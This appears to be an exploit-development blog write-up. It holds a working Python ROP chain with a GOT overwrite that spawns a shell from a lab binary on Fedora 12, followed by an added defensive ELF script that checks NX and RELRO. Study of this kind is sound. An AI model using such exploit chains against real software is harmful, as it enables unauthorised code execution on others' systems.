
System/BOF

[intel][x86] ROP

Rakehell 2015. 9. 29. 22:44
```python
#!/usr/bin/env python
#
#	ROP + GOT overwrite
#

import struct

p  = lambda x : struct.pack("<l", x)        # pack a 32-bit little-endian address
up = lambda x : struct.unpack("<L", x)[0]   # unpack one (unused below, kept from the post)

# var
strcpy   = p(0x08048374)                    # strcpy@plt
puts_got = [p(0x804975c), p(0x804975d), p(0x804975e), p(0x804975f)]   # puts@got, byte by byte
puts_plt = p(0x8048394)                     # puts@plt
ppr      = p(0x8048588)                     # pop; pop; ret gadget
bbs      = [p(0x08049774), p(0x08049775), p(0x08049776), p(0x08049778),
            p(0x08049779), p(0x0804977a), p(0x0804977b)]               # .bss slots for "/bin/sh"

# single bytes in the binary (each followed by a NUL, so strcpy copies exactly one byte)
hex_00 = p(0x0804976c)
hex_1d = p(0x0804976e)
hex_b7 = p(0x08049770)
hex_e0 = p(0x08049772)

str_slash = p(0x08048134)
str_b     = p(0x08048137)
str_in    = p(0x0804813d)
str_s     = p(0x08048142)
str_h     = p(0x0804835a)
str_null  = p(0x0804833a)

# dummy
payload = ""
payload += "A" * 272

# stage - 1 strcpy(bbs, "/bin/sh")
payload += strcpy
payload += ppr
payload += bbs[0]
payload += str_slash

payload += strcpy
payload += ppr
payload += bbs[1]
payload += str_b

payload += strcpy
payload += ppr
payload += bbs[2]
payload += str_in

payload += strcpy
payload += ppr
payload += bbs[3]
payload += str_slash

payload += strcpy
payload += ppr
payload += bbs[4]
payload += str_s

payload += strcpy
payload += ppr
payload += bbs[5]
payload += str_h

payload += strcpy
payload += ppr
payload += bbs[6]
payload += str_null

# stage - 1 GOT overwrite (got_puts)
payload += strcpy
payload += ppr
payload += puts_got[0]
payload += hex_e0

payload += strcpy
payload += ppr
payload += puts_got[1]
payload += hex_b7

payload += strcpy
payload += ppr
payload += puts_got[2]
payload += hex_1d

payload += strcpy
payload += ppr
payload += puts_got[3]
payload += hex_00

# stage - 0
payload += puts_plt
payload += "B" * 4
payload += bbs[0]

print (payload)
```

The ROP environment is

Fedora release 12, kernel 2.6.

ASLR was turned off.

It was turned off with `ulimit -s unlimited`; the protections that remained in place were

NX and ASCII armor.

The payload uses both ROP and GOT overwrite at the same time.

 

./vuln `python vuln.py`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtƒˆ…t—4tƒˆ…u—7tƒˆ…v—=tƒˆ…x—4tƒˆ…y—Btƒˆ…z—Zƒtƒˆ…{—:ƒtƒˆ…\—r—tƒˆ…]—p—tƒˆ…^—n—tƒˆ…_—l—”ƒBBBBt—
sh-4.0$ 
It runs like this.
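The post's chain works because NX is on but the GOT stays writable, so strcpy() can rewrite puts@got one byte at a time. Whether a binary is in that state can be read from its program headers. The script below is an added example, not the post's code: it parses a little-endian ELF32 image's program headers and dynamic section and reports NX (PT_GNU_STACK without PF_X) and the RELRO level. Full RELRO (PT_GNU_RELRO together with BIND_NOW) is the build setting that remaps the GOT read-only after loading, so the GOT overwrite above would fault instead of redirecting puts@plt; partial RELRO leaves .got.plt writable. The `build_fake_elf32` helper and the three sample images it produces are constructed for this demonstration (they contain no code); on a real binary, pass its path as the first argument.

```python
#!/usr/bin/env python3
# Added example: report NX and RELRO status from an ELF32 image's headers.
import struct

PT_DYNAMIC   = 2
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1
DT_NULL, DT_BIND_NOW, DT_FLAGS = 0, 24, 30
DF_BIND_NOW = 0x8


def parse_elf32_phdrs(data):
    """Return the program headers of a little-endian ELF32 image as dicts."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:      # EI_CLASS=ELFCLASS32, EI_DATA=ELFDATA2LSB
        raise ValueError("only little-endian ELF32 is handled here")
    e_phoff = struct.unpack_from("<I", data, 28)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    phdrs = []
    for i in range(e_phnum):
        # Elf32_Phdr: p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align
        fields = struct.unpack_from("<8I", data, e_phoff + i * e_phentsize)
        p_type, p_offset, _, _, p_filesz, _, p_flags, _ = fields
        phdrs.append({"type": p_type, "offset": p_offset,
                      "filesz": p_filesz, "flags": p_flags})
    return phdrs


def dynamic_tags(data, phdrs):
    """Yield (d_tag, d_val) pairs from PT_DYNAMIC, stopping at DT_NULL."""
    for ph in phdrs:
        if ph["type"] != PT_DYNAMIC:
            continue
        for off in range(ph["offset"], ph["offset"] + ph["filesz"], 8):
            tag, val = struct.unpack_from("<II", data, off)
            if tag == DT_NULL:
                return
            yield tag, val


def check_mitigations(data):
    """Return {'nx': bool, 'relro': 'none'|'partial'|'full'} for an ELF32 image."""
    phdrs = parse_elf32_phdrs(data)
    stack = [ph["flags"] for ph in phdrs if ph["type"] == PT_GNU_STACK]
    # A missing PT_GNU_STACK makes the kernel fall back to an executable stack.
    nx = bool(stack) and not (stack[0] & PF_X)
    has_relro_seg = any(ph["type"] == PT_GNU_RELRO for ph in phdrs)
    bind_now = any(tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW)
                   for tag, val in dynamic_tags(data, phdrs))
    if has_relro_seg and bind_now:
        relro = "full"       # GOT resolved eagerly, then remapped read-only
    elif has_relro_seg:
        relro = "partial"    # .got.plt stays writable: a GOT overwrite still lands
    else:
        relro = "none"
    return {"nx": nx, "relro": relro}


def build_fake_elf32(phdr_entries, dyn_entries=None):
    """Constructed sample (hypothetical helper): a minimal ELF32 image made of an
    ELF header, a program header table and an optional dynamic section, no code."""
    nph = len(phdr_entries) + (1 if dyn_entries is not None else 0)
    phoff = 52
    dyn_off = phoff + nph * 32
    dyn = b""
    if dyn_entries is not None:
        for tag, val in dyn_entries + [(DT_NULL, 0)]:
            dyn += struct.pack("<II", tag, val)
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8
    # e_type=ET_EXEC, e_machine=EM_386, e_version, e_entry, e_phoff, e_shoff,
    # e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, phoff, 0, 0,
                               52, 32, nph, 0, 0, 0)
    table = b"".join(struct.pack("<8I", t, 0, 0, 0, 0, 0, f, 0)
                     for t, f in phdr_entries)
    if dyn_entries is not None:
        table += struct.pack("<8I", PT_DYNAMIC, dyn_off, 0, 0, len(dyn), len(dyn), 6, 4)
    return ehdr + table + dyn


# Constructed sample images, not real binaries.
VULN_LIKE = build_fake_elf32([(1, 5), (PT_GNU_STACK, 6)], dyn_entries=[(1, 0)])
PARTIAL = build_fake_elf32([(1, 5), (PT_GNU_STACK, 6), (PT_GNU_RELRO, 4)],
                           dyn_entries=[(1, 0)])
FULL = build_fake_elf32([(1, 5), (PT_GNU_STACK, 6), (PT_GNU_RELRO, 4)],
                        dyn_entries=[(1, 0), (DT_FLAGS, DF_BIND_NOW)])

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(check_mitigations(fh.read()))
    else:
        for name, img in (("vuln-like", VULN_LIKE), ("partial-relro", PARTIAL),
                          ("full-relro", FULL)):
            print(name, check_mitigations(img))
```

The "vuln-like" image mirrors the post's setup (NX on, no RELRO); only the "full-relro" image reports a read-only GOT, which is the build flag (`-Wl,-z,relro,-z,now`) that closes this particular overwrite path.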
